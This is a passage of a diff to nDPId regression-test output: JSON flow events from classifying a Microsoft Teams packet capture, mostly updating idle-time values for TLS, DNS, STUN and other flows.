+00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041672419,"flow_last_seen":1587041697427,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":1674,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Telegram","breed":"Acceptable","category":"Chat"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Telegram","breed":"Acceptable","category":"Chat"}} 
+00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Azure","breed":"Acceptable","category":"Cloud"}} 
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} -00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041695305,"flow_last_seen":1587041698021,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":1214,"flow_tot_l4_payload_len":7582,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1587041695305,"flow_last_seen":1587041697619,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -567,8 +567,8 @@ 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 